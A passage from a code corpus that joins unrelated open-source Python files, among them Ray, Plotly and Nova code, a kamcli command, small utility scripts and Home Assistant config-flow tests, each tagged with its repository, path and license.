self.get_model().on_load_checkpoint(checkpoint=state_dict)
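    # Sketch of the LightningModule hooks these two methods delegate to
    # (user-side code; the attribute names are illustrative):
    #
    #   def on_save_checkpoint(self, checkpoint):
    #       checkpoint["my_counter"] = self.my_counter
    #
    #   def on_load_checkpoint(self, checkpoint):
    #       self.my_counter = checkpoint["my_counter"]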
def _get_train_loader(self):
if not hasattr(self, "_train_loader") or self._train_loader is None:
raise RuntimeError(
"Training Operator does not have any "
"registered training loader. Make sure "
"to pass in a training loader to "
"TrainingOperator.from_ptl or implement "
"train_dataloader in your LightningModule."
)
return self._train_loader
def _get_validation_loader(self):
if not hasattr(self, "_validation_loader") or self._validation_loader is None:
raise RuntimeError(
"Training Operator does not have any "
"registered validation loader. Make sure "
"to pass in a validation loader to "
"TrainingOperator.from_ptl or implement "
"val_dataloader in your LightningModule."
)
return self._validation_loader
| ray-project/ray | python/ray/util/sgd/torch/lightning_operator.py | Python | apache-2.0 | 20,906 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
requirements = [
'Click>=6.0',
# TODO: put package requirements here
]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name='trace',
version='0.1.0',
description="Map your brain with Deep Learning",
long_description=readme + '\n\n' + history,
author="Ignacio Tartavull",
author_email='[email protected]',
url='https://github.com/tartavull/trace',
packages=['trace'],
package_dir={'trace':
'trace'},
entry_points={
'console_scripts': [
'trace=trace.cli:main'
]
},
include_package_data=True,
    package_data={
        # Include *.txt, *.xml, *.html and *.js data files found in any package:
        '': ['*.txt', '*.xml', '*.html', '*.js']
},
install_requires=requirements,
license="MIT license",
zip_safe=False,
keywords='trace',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
test_suite='tests',
tests_require=test_requirements
)
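# Once installed, the console_scripts entry point above exposes trace.cli:main
# as a `trace` executable; a hypothetical invocation would be:
#
#   $ pip install .
#   $ trace --help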
| tartavull/trace | setup.py | Python | mit | 1,724 |
import _plotly_utils.basevalidators
class XpadValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="xpad", parent_name="scatter.marker.colorbar", **kwargs
):
super(XpadValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
min=kwargs.pop("min", 0),
**kwargs
)
| plotly/plotly.py | packages/python/plotly/plotly/validators/scatter/marker/colorbar/_xpad.py | Python | mit | 460 |
import click
import json
from kamcli.cli import pass_context
from kamcli.iorpc import command_ctl
@click.command("ps", short_help="Print the list of kamailio processes")
@pass_context
def cli(ctx):
"""Show details about running kamailio processes
\b
"""
command_ctl(ctx, "core.psx", [], {"func": cmd_ps_result_print})
# callback to print the result of the rpc command
def cmd_ps_result_print(ctx, response, params=None):
ctx.vlog("formatting the response for command ps")
rdata = json.loads(response.decode())
if "result" in rdata:
for r in rdata["result"]:
ctx.printf("%4d %5d %s", r["IDX"], r["PID"], r["DSC"])
else:
print(json.dumps(rdata, indent=4, separators=(",", ": ")))
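# For reference, cmd_ps_result_print expects the core.psx reply to be shaped
# roughly like this (values are illustrative):
#   {"result": [{"IDX": 0, "PID": 12345, "DSC": "udp receiver"}, ...]}
# Anything without a "result" key is just pretty-printed as JSON.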
| asipto/kamcli | kamcli/commands/cmd_ps.py | Python | gpl-2.0 | 743 |
#!/usr/bin/python
# Delete Wallpaper. By Anjan Momi.
# {simple python script to show and/or delete current wallpaper}
# Copyright (C) {2014} {Anjandev Momi}
# Contact me at [email protected]
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os
import sys
import subprocess
def main():
playlist = "~/.fehbg"
playlist = os.path.expanduser(playlist)
with open(playlist) as fin:
feh = fin.readlines()
feh = [elem.strip().split('\'') for elem in feh]
wallpapers = []
for lists in feh:
for walls in lists:
wallpapers.append(walls)
wallpapers.pop(0)
wallpapers.pop(0)
    # pop out spaces in list
while(' ' in wallpapers):
wallpapers.remove(' ')
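    # Illustrative example (hypothetical ~/.fehbg contents):
    #   #!/bin/sh
    #   feh --bg-fill '/home/user/wall1.png' '/home/user/wall2.png'
    # After splitting each line on single quotes, dropping the first two
    # tokens and removing whitespace-only tokens, wallpapers is roughly
    #   ['/home/user/wall1.png', '/home/user/wall2.png']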
screen = int(input("On what screen is the wallpaper you wish to remove? "))
if screen == 0:
print("I think you mean screen 1")
    elif screen == 1:
p = subprocess.Popen(["/bin/feh", wallpapers[0]])
returncode = p.wait()
ask_and_delete(wallpapers[0])
else:
        # shift the user-entered number down by one since the list is zero-indexed
screen = screen - 1
p = subprocess.Popen(["/bin/feh", wallpapers[screen]])
returncode = p.wait()
ask_and_delete(wallpapers[screen])
def ask_and_delete(wall):
delete = input("was that the wallpaper you wanted to delete? [yes/no] ")
if delete == "yes":
os.remove(wall)
elif delete == "no":
wrongscreen = input("Wrong screen? Yes to select again. No to quit. [yes/no] ")
if wrongscreen == "yes":
main()
elif wrongscreen == "no":
sys.exit(0)
else:
print("Please choose yes or no ")
else:
print("Please choose yes or no ")
if __name__=="__main__":
main()
| anjandev/deletewallpaper | wall.py | Python | gpl-3.0 | 2,496 |
import unittest
class Test_motion(unittest.TestCase):
pass
if __name__ == "__main__":
unittest.main() | rizen1892/SmartHomeSolutions-Web | app/motion_tests.py | Python | gpl-2.0 | 112 |
# -*- coding: utf-8 -*-
import atexit
import logging
import logging.handlers
from threading import Lock
import inspect
import sys
from django.db.models import Model
from types import ModuleType
import six
logger_cache = {}
logger_cache_lock = Lock()
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
class LogWrapperForObject(object):
"""This class masks the logger in order to print out the id of the object to identify it.
Args:
logger: The logger to mask
o: The object that the logger was made for
id: If the object is not likely to provide ``pk`` on its own, then pass something here
"""
WRAPPED_FIELDS = ["trace", "debug", "info", "warning", "error", "exception"]
def __init__(self, logger, o, id=None):
self._logger = logger
self._o = o
self._id = id
def __getattr__(self, attr):
if attr not in self.WRAPPED_FIELDS:
raise AttributeError("Could not find {}".format(attr))
result = getattr(self._logger, attr)
def _log(s, *args, **kwargs):
if self._id is not None:
s = "[{}] {}".format(self._id, s)
elif hasattr(self._o, "pk"):
s = "[{}] {}".format(self._o.pk, s)
else:
s = "[{}] {}".format(str(self._o), s)
return result(s, *args, **kwargs)
return _log
def create_logger(o, additional_id=None):
"""Creates a logger that has its filename derived from the passed object's properties.
The logger is targeted at the logserver.
Args:
o: Object to create logger for.
additional_id: If the object does not provide ``pk``, then you can pass this parameter.
Returns:
Instance of logger.
"""
wrap = None
if isinstance(o, six.string_types):
if o in sys.modules:
# str -> module
return create_logger(sys.modules[o], additional_id)
logger_name = o
elif isinstance(o, ModuleType):
module_name = o.__name__
logger_name = module_name
if additional_id is not None:
wrap = LogWrapperForObject
else:
module_name = o.__module__
try:
o_name = o.__name__
except AttributeError:
o_name = type(o).__name__
logger_name = "{}.{}".format(module_name, o_name)
if isinstance(o, Model) or (inspect.isclass(o) and issubclass(o, Model)):
wrap = LogWrapperForObject
with logger_cache_lock:
if None not in logger_cache:
logger = logging.getLogger()
logger.setLevel(logging.INFO)
socket_handler = logging.handlers.SocketHandler(
"localhost", logging.handlers.DEFAULT_TCP_LOGGING_PORT)
atexit.register(socket_handler.close)
logger.addHandler(socket_handler)
logger_cache[None] = logger
if logger_name not in logger_cache:
logger_cache[logger_name] = logging.getLogger(logger_name)
result = logger_cache[logger_name]
if wrap:
return wrap(result, o, additional_id)
else:
return result
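# Hypothetical usage sketch (object names are made up):
#
#   log = create_logger(__name__)                 # plain module logger
#   log = create_logger(some_model_instance)      # messages prefixed with "[<pk>]"
#   log = create_logger(__name__, "appliance-42") # messages prefixed with "[appliance-42]"
#   log.info("provisioning started")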
| RedHatQE/cfme_tests | sprout/sprout/log.py | Python | gpl-2.0 | 3,202 |
# Copyright 2012 SINA Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from nova.api.openstack.compute.contrib import attach_interfaces \
as attach_interfaces_v2
from nova.api.openstack.compute.plugins.v3 import attach_interfaces \
as attach_interfaces_v21
from nova.compute import api as compute_api
from nova import exception
from nova.network import api as network_api
from nova import objects
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_network_cache_model
from webob import exc
CONF = cfg.CONF
FAKE_UUID1 = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
FAKE_UUID2 = 'bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb'
FAKE_PORT_ID1 = '11111111-1111-1111-1111-111111111111'
FAKE_PORT_ID2 = '22222222-2222-2222-2222-222222222222'
FAKE_PORT_ID3 = '33333333-3333-3333-3333-333333333333'
FAKE_NOT_FOUND_PORT_ID = '00000000-0000-0000-0000-000000000000'
FAKE_NET_ID1 = '44444444-4444-4444-4444-444444444444'
FAKE_NET_ID2 = '55555555-5555-5555-5555-555555555555'
FAKE_NET_ID3 = '66666666-6666-6666-6666-666666666666'
FAKE_BAD_NET_ID = '00000000-0000-0000-0000-000000000000'
port_data1 = {
"id": FAKE_PORT_ID1,
"network_id": FAKE_NET_ID1,
"admin_state_up": True,
"status": "ACTIVE",
"mac_address": "aa:aa:aa:aa:aa:aa",
"fixed_ips": ["10.0.1.2"],
"device_id": FAKE_UUID1,
}
port_data2 = {
"id": FAKE_PORT_ID2,
"network_id": FAKE_NET_ID2,
"admin_state_up": True,
"status": "ACTIVE",
"mac_address": "bb:bb:bb:bb:bb:bb",
"fixed_ips": ["10.0.2.2"],
"device_id": FAKE_UUID1,
}
port_data3 = {
"id": FAKE_PORT_ID3,
"network_id": FAKE_NET_ID3,
"admin_state_up": True,
"status": "ACTIVE",
"mac_address": "bb:bb:bb:bb:bb:bb",
"fixed_ips": ["10.0.2.2"],
"device_id": '',
}
fake_networks = [FAKE_NET_ID1, FAKE_NET_ID2]
ports = [port_data1, port_data2, port_data3]
def fake_list_ports(self, *args, **kwargs):
result = []
for port in ports:
if port['device_id'] == kwargs['device_id']:
result.append(port)
return {'ports': result}
def fake_show_port(self, context, port_id, **kwargs):
for port in ports:
if port['id'] == port_id:
return {'port': port}
else:
raise exception.PortNotFound(port_id=port_id)
def fake_attach_interface(self, context, instance, network_id, port_id,
requested_ip='192.168.1.3'):
if not network_id:
    # if no network_id is given when adding a port to an instance, use the
    # first default network.
network_id = fake_networks[0]
if network_id == FAKE_BAD_NET_ID:
raise exception.NetworkNotFound(network_id=network_id)
if not port_id:
port_id = ports[fake_networks.index(network_id)]['id']
if port_id == FAKE_NOT_FOUND_PORT_ID:
raise exception.PortNotFound(port_id=port_id)
vif = fake_network_cache_model.new_vif()
vif['id'] = port_id
vif['network']['id'] = network_id
vif['network']['subnets'][0]['ips'][0]['address'] = requested_ip
return vif
def fake_detach_interface(self, context, instance, port_id):
for port in ports:
if port['id'] == port_id:
return
raise exception.PortNotFound(port_id=port_id)
def fake_get_instance(self, *args, **kwargs):
return objects.Instance(uuid=FAKE_UUID1)
class InterfaceAttachTestsV21(test.NoDBTestCase):
controller_cls = attach_interfaces_v21.InterfaceAttachmentController
validate_exc = exception.ValidationError
in_use_exc = exc.HTTPConflict
not_found_exc = exc.HTTPNotFound
not_usable_exc = exc.HTTPBadRequest
def setUp(self):
super(InterfaceAttachTestsV21, self).setUp()
self.flags(auth_strategy=None, group='neutron')
self.flags(url='http://anyhost/', group='neutron')
self.flags(timeout=30, group='neutron')
self.stubs.Set(network_api.API, 'show_port', fake_show_port)
self.stubs.Set(network_api.API, 'list_ports', fake_list_ports)
self.stubs.Set(compute_api.API, 'get', fake_get_instance)
self.expected_show = {'interfaceAttachment':
{'net_id': FAKE_NET_ID1,
'port_id': FAKE_PORT_ID1,
'mac_addr': port_data1['mac_address'],
'port_state': port_data1['status'],
'fixed_ips': port_data1['fixed_ips'],
}}
self.attachments = self.controller_cls()
self.req = fakes.HTTPRequest.blank('')
@mock.patch.object(compute_api.API, 'get',
side_effect=exception.InstanceNotFound(instance_id=''))
def _test_instance_not_found(self, func, args, mock_get, kwargs=None):
if not kwargs:
kwargs = {}
self.assertRaises(exc.HTTPNotFound, func, self.req, *args, **kwargs)
def test_show_instance_not_found(self):
self._test_instance_not_found(self.attachments.show, ('fake', 'fake'))
def test_index_instance_not_found(self):
self._test_instance_not_found(self.attachments.index, ('fake', ))
def test_detach_interface_instance_not_found(self):
self._test_instance_not_found(self.attachments.delete,
('fake', 'fake'))
def test_attach_interface_instance_not_found(self):
self._test_instance_not_found(self.attachments.create, ('fake', ),
kwargs={'body': {'interfaceAttachment': {}}})
def test_show(self):
result = self.attachments.show(self.req, FAKE_UUID1, FAKE_PORT_ID1)
self.assertEqual(self.expected_show, result)
def test_show_with_port_not_found(self):
self.assertRaises(exc.HTTPNotFound,
self.attachments.show, self.req, FAKE_UUID2,
FAKE_PORT_ID1)
@mock.patch.object(network_api.API, 'show_port',
side_effect=exception.Forbidden)
def test_show_forbidden(self, show_port_mock):
self.assertRaises(exc.HTTPForbidden,
self.attachments.show, self.req, FAKE_UUID1,
FAKE_PORT_ID1)
def test_delete(self):
self.stubs.Set(compute_api.API, 'detach_interface',
fake_detach_interface)
result = self.attachments.delete(self.req, FAKE_UUID1, FAKE_PORT_ID1)
        # NOTE: on v2.1, the HTTP status code is set as the wsgi_code of the
        # API method instead of status_int on a response object.
if isinstance(self.attachments,
attach_interfaces_v21.InterfaceAttachmentController):
status_int = self.attachments.delete.wsgi_code
else:
status_int = result.status_int
self.assertEqual(202, status_int)
def test_detach_interface_instance_locked(self):
def fake_detach_interface_from_locked_server(self, context,
instance, port_id):
raise exception.InstanceIsLocked(instance_uuid=FAKE_UUID1)
self.stubs.Set(compute_api.API,
'detach_interface',
fake_detach_interface_from_locked_server)
self.assertRaises(exc.HTTPConflict,
self.attachments.delete,
self.req,
FAKE_UUID1,
FAKE_PORT_ID1)
def test_delete_interface_not_found(self):
self.stubs.Set(compute_api.API, 'detach_interface',
fake_detach_interface)
self.assertRaises(exc.HTTPNotFound,
self.attachments.delete,
self.req,
FAKE_UUID1,
                          'invalid-port-id')
def test_attach_interface_instance_locked(self):
def fake_attach_interface_to_locked_server(self, context,
instance, network_id, port_id, requested_ip):
raise exception.InstanceIsLocked(instance_uuid=FAKE_UUID1)
self.stubs.Set(compute_api.API,
'attach_interface',
fake_attach_interface_to_locked_server)
body = {}
self.assertRaises(exc.HTTPConflict,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
def test_attach_interface_without_network_id(self):
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface)
body = {}
result = self.attachments.create(self.req, FAKE_UUID1, body=body)
self.assertEqual(result['interfaceAttachment']['net_id'],
FAKE_NET_ID1)
def test_attach_interface_with_network_id(self):
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface)
body = {'interfaceAttachment': {'net_id': FAKE_NET_ID2}}
result = self.attachments.create(self.req, FAKE_UUID1, body=body)
self.assertEqual(result['interfaceAttachment']['net_id'],
FAKE_NET_ID2)
def _attach_interface_bad_request_case(self, body):
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface)
self.assertRaises(exc.HTTPBadRequest,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
def _attach_interface_not_found_case(self, body):
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface)
self.assertRaises(self.not_found_exc,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
def test_attach_interface_with_port_and_network_id(self):
body = {
'interfaceAttachment': {
'port_id': FAKE_PORT_ID1,
'net_id': FAKE_NET_ID2
}
}
self._attach_interface_bad_request_case(body)
def test_attach_interface_with_not_found_network_id(self):
body = {
'interfaceAttachment': {
'net_id': FAKE_BAD_NET_ID
}
}
self._attach_interface_not_found_case(body)
def test_attach_interface_with_not_found_port_id(self):
body = {
'interfaceAttachment': {
'port_id': FAKE_NOT_FOUND_PORT_ID
}
}
self._attach_interface_not_found_case(body)
def test_attach_interface_with_invalid_state(self):
def fake_attach_interface_invalid_state(*args, **kwargs):
raise exception.InstanceInvalidState(
instance_uuid='', attr='', state='',
method='attach_interface')
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface_invalid_state)
body = {'interfaceAttachment': {'net_id': FAKE_NET_ID1}}
self.assertRaises(exc.HTTPConflict,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
@mock.patch.object(compute_api.API, 'attach_interface',
side_effect=NotImplementedError())
def test_attach_interface_with_not_implemented(self, _mock):
body = {'interfaceAttachment': {'net_id': FAKE_NET_ID1}}
self.assertRaises(exc.HTTPNotImplemented,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
def test_detach_interface_with_invalid_state(self):
def fake_detach_interface_invalid_state(*args, **kwargs):
raise exception.InstanceInvalidState(
instance_uuid='', attr='', state='',
method='detach_interface')
self.stubs.Set(compute_api.API, 'detach_interface',
fake_detach_interface_invalid_state)
self.assertRaises(exc.HTTPConflict,
self.attachments.delete,
self.req,
FAKE_UUID1,
FAKE_NET_ID1)
@mock.patch.object(compute_api.API, 'detach_interface',
side_effect=NotImplementedError())
def test_detach_interface_with_not_implemented(self, _mock):
self.assertRaises(exc.HTTPNotImplemented,
self.attachments.delete,
self.req, FAKE_UUID1, FAKE_NET_ID1)
def test_attach_interface_invalid_fixed_ip(self):
body = {
'interfaceAttachment': {
'net_id': FAKE_NET_ID1,
'fixed_ips': [{'ip_address': 'invalid_ip'}]
}
}
self.assertRaises(self.validate_exc,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
@mock.patch.object(compute_api.API, 'get')
@mock.patch.object(compute_api.API, 'attach_interface')
def test_attach_interface_fixed_ip_already_in_use(self,
attach_mock,
get_mock):
fake_instance = objects.Instance(uuid=FAKE_UUID1)
get_mock.return_value = fake_instance
attach_mock.side_effect = exception.FixedIpAlreadyInUse(
address='10.0.2.2', instance_uuid=FAKE_UUID1)
body = {}
self.assertRaises(self.in_use_exc,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
ctxt = self.req.environ['nova.context']
attach_mock.assert_called_once_with(ctxt, fake_instance, None,
None, None)
get_mock.assert_called_once_with(ctxt, FAKE_UUID1,
want_objects=True,
expected_attrs=None)
@mock.patch.object(compute_api.API, 'get')
@mock.patch.object(compute_api.API, 'attach_interface')
def test_attach_interface_port_in_use(self,
attach_mock,
get_mock):
fake_instance = objects.Instance(uuid=FAKE_UUID1)
get_mock.return_value = fake_instance
attach_mock.side_effect = exception.PortInUse(
port_id=FAKE_PORT_ID1)
body = {}
self.assertRaises(self.in_use_exc,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
ctxt = self.req.environ['nova.context']
attach_mock.assert_called_once_with(ctxt, fake_instance, None,
None, None)
get_mock.assert_called_once_with(ctxt, FAKE_UUID1,
want_objects=True,
expected_attrs=None)
@mock.patch.object(compute_api.API, 'get')
@mock.patch.object(compute_api.API, 'attach_interface')
def test_attach_interface_port_not_usable(self,
attach_mock,
get_mock):
fake_instance = objects.Instance(uuid=FAKE_UUID1)
get_mock.return_value = fake_instance
attach_mock.side_effect = exception.PortNotUsable(
port_id=FAKE_PORT_ID1,
instance=fake_instance.uuid)
body = {}
self.assertRaises(self.not_usable_exc,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
ctxt = self.req.environ['nova.context']
attach_mock.assert_called_once_with(ctxt, fake_instance, None,
None, None)
get_mock.assert_called_once_with(ctxt, FAKE_UUID1,
want_objects=True,
expected_attrs=None)
@mock.patch.object(compute_api.API, 'get')
@mock.patch.object(compute_api.API, 'attach_interface')
def test_attach_interface_no_more_fixed_ips(self,
attach_mock,
get_mock):
fake_instance = objects.Instance(uuid=FAKE_UUID1)
get_mock.return_value = fake_instance
attach_mock.side_effect = exception.NoMoreFixedIps(
net=FAKE_NET_ID1)
body = {}
self.assertRaises(exc.HTTPBadRequest,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
ctxt = self.req.environ['nova.context']
attach_mock.assert_called_once_with(ctxt, fake_instance, None,
None, None)
get_mock.assert_called_once_with(ctxt, FAKE_UUID1,
want_objects=True,
expected_attrs=None)
def _test_attach_interface_with_invalid_parameter(self, param):
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface)
body = {'interface_attachment': param}
self.assertRaises(exception.ValidationError,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
def test_attach_interface_instance_with_non_uuid_net_id(self):
param = {'net_id': 'non_uuid'}
self._test_attach_interface_with_invalid_parameter(param)
def test_attach_interface_instance_with_non_uuid_port_id(self):
param = {'port_id': 'non_uuid'}
self._test_attach_interface_with_invalid_parameter(param)
def test_attach_interface_instance_with_non_array_fixed_ips(self):
param = {'fixed_ips': 'non_array'}
self._test_attach_interface_with_invalid_parameter(param)
class InterfaceAttachTestsV2(InterfaceAttachTestsV21):
controller_cls = attach_interfaces_v2.InterfaceAttachmentController
validate_exc = exc.HTTPBadRequest
in_use_exc = exc.HTTPBadRequest
def test_attach_interface_instance_with_non_uuid_net_id(self):
pass
def test_attach_interface_instance_with_non_uuid_port_id(self):
pass
def test_attach_interface_instance_with_non_array_fixed_ips(self):
pass
class AttachInterfacesPolicyEnforcementv21(test.NoDBTestCase):
def setUp(self):
super(AttachInterfacesPolicyEnforcementv21, self).setUp()
self.controller = \
attach_interfaces_v21.InterfaceAttachmentController()
self.req = fakes.HTTPRequest.blank('')
self.rule_name = "os_compute_api:os-attach-interfaces"
self.policy.set_rules({self.rule_name: "project:non_fake"})
def test_index_attach_interfaces_policy_failed(self):
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.index, self.req, fakes.FAKE_UUID)
self.assertEqual(
"Policy doesn't allow %s to be performed." % self.rule_name,
exc.format_message())
def test_show_attach_interfaces_policy_failed(self):
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.show, self.req, fakes.FAKE_UUID, FAKE_PORT_ID1)
self.assertEqual(
"Policy doesn't allow %s to be performed." % self.rule_name,
exc.format_message())
def test_create_attach_interfaces_policy_failed(self):
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.create, self.req, fakes.FAKE_UUID, body={})
self.assertEqual(
"Policy doesn't allow %s to be performed." % self.rule_name,
exc.format_message())
def test_delete_attach_interfaces_policy_failed(self):
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.delete, self.req, fakes.FAKE_UUID, FAKE_PORT_ID1)
self.assertEqual(
"Policy doesn't allow %s to be performed." % self.rule_name,
exc.format_message())
| jeffrey4l/nova | nova/tests/unit/api/openstack/compute/contrib/test_attach_interfaces.py | Python | apache-2.0 | 20,522 |
import re
def count_linenum(filename):
total_line = 0
comment_line = 0
blank_line = 0
with open(filename) as f:
lines = f.readlines()
total_line = len(lines)
line_index = 0
    # iterate over every line
while line_index < total_line:
line = lines[line_index]
        # check whether the line is a comment
if line.startswith("#"):
comment_line += 1
        elif re.match(r"\s*'''", line) is not None:
            comment_line += 1
            # advance to the closing ''' so each docstring line is counted once
            while re.match(r".*'''$", line) is None:
                line_index += 1
                line = lines[line_index]
                comment_line += 1
        # check whether the line is blank
elif line == "\n":
blank_line += 1
line_index += 1
    print("In %s:" % filename)
    print("Total lines:  ", total_line)
    print("Comment lines:", comment_line)
    print("Blank lines:  ", blank_line)
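# Worked example: for a hypothetical file containing
#   # a comment
#   '''a two-line
#   docstring'''
#   x = 1
#   (blank line)
# the function reports 5 total lines, 3 comment lines and 1 blank line.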
if __name__ == '__main__':
filename = input("please enter filename:")
count_linenum(filename)
| pythonzhichan/DailyQuestion | 7zero/question_6.py | Python | mit | 1,077 |
"""Tests for the Config Entry Flow helper."""
from unittest.mock import patch, Mock
import pytest
from homeassistant import config_entries, data_entry_flow, setup
from homeassistant.helpers import config_entry_flow
from tests.common import (
MockConfigEntry, MockModule, mock_coro, mock_integration,
mock_entity_platform)
@pytest.fixture
def discovery_flow_conf(hass):
"""Register a handler."""
handler_conf = {
'discovered': False,
}
async def has_discovered_devices(hass):
"""Mock if we have discovered devices."""
return handler_conf['discovered']
with patch.dict(config_entries.HANDLERS):
config_entry_flow.register_discovery_flow(
'test', 'Test', has_discovered_devices,
config_entries.CONN_CLASS_LOCAL_POLL)
yield handler_conf
@pytest.fixture
def webhook_flow_conf(hass):
"""Register a handler."""
with patch.dict(config_entries.HANDLERS):
config_entry_flow.register_webhook_flow(
'test_single', 'Test Single', {}, False)
config_entry_flow.register_webhook_flow(
'test_multiple', 'Test Multiple', {}, True)
yield {}
async def test_single_entry_allowed(hass, discovery_flow_conf):
"""Test only a single entry is allowed."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
MockConfigEntry(domain='test').add_to_hass(hass)
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'single_instance_allowed'
async def test_user_no_devices_found(hass, discovery_flow_conf):
"""Test if no devices found."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
flow.context = {
'source': config_entries.SOURCE_USER
}
result = await flow.async_step_confirm(user_input={})
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'no_devices_found'
async def test_user_has_confirmation(hass, discovery_flow_conf):
    """Test user requires no confirmation to set up."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
discovery_flow_conf['discovered'] = True
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
@pytest.mark.parametrize('source', ['discovery', 'ssdp', 'zeroconf'])
async def test_discovery_single_instance(hass, discovery_flow_conf, source):
    """Test we do not allow duplicates."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
MockConfigEntry(domain='test').add_to_hass(hass)
result = await getattr(flow, "async_step_{}".format(source))({})
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'single_instance_allowed'
@pytest.mark.parametrize('source', ['discovery', 'ssdp', 'zeroconf'])
async def test_discovery_confirmation(hass, discovery_flow_conf, source):
"""Test we ask for confirmation via discovery."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
result = await getattr(flow, "async_step_{}".format(source))({})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'confirm'
result = await flow.async_step_confirm({})
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
async def test_multiple_discoveries(hass, discovery_flow_conf):
"""Test we only create one instance for multiple discoveries."""
mock_entity_platform(hass, 'config_flow.test', None)
result = await hass.config_entries.flow.async_init(
'test', context={'source': config_entries.SOURCE_DISCOVERY}, data={})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
# Second discovery
result = await hass.config_entries.flow.async_init(
'test', context={'source': config_entries.SOURCE_DISCOVERY}, data={})
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
async def test_only_one_in_progress(hass, discovery_flow_conf):
    """Test a user-initiated flow finishes and cancels the discovered one."""
mock_entity_platform(hass, 'config_flow.test', None)
# Discovery starts flow
result = await hass.config_entries.flow.async_init(
'test', context={'source': config_entries.SOURCE_DISCOVERY}, data={})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
# User starts flow
result = await hass.config_entries.flow.async_init(
'test', context={'source': config_entries.SOURCE_USER}, data={})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
# Discovery flow has not been aborted
assert len(hass.config_entries.flow.async_progress()) == 2
# Discovery should be aborted once user confirms
result = await hass.config_entries.flow.async_configure(
result['flow_id'], {})
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert len(hass.config_entries.flow.async_progress()) == 0
async def test_import_no_confirmation(hass, discovery_flow_conf):
"""Test import requires no confirmation to set up."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
discovery_flow_conf['discovered'] = True
result = await flow.async_step_import(None)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
async def test_import_single_instance(hass, discovery_flow_conf):
    """Test import doesn't create a second instance."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
discovery_flow_conf['discovered'] = True
MockConfigEntry(domain='test').add_to_hass(hass)
result = await flow.async_step_import(None)
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
async def test_webhook_single_entry_allowed(hass, webhook_flow_conf):
"""Test only a single entry is allowed."""
flow = config_entries.HANDLERS['test_single']()
flow.hass = hass
MockConfigEntry(domain='test_single').add_to_hass(hass)
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'one_instance_allowed'
async def test_webhook_multiple_entries_allowed(hass, webhook_flow_conf):
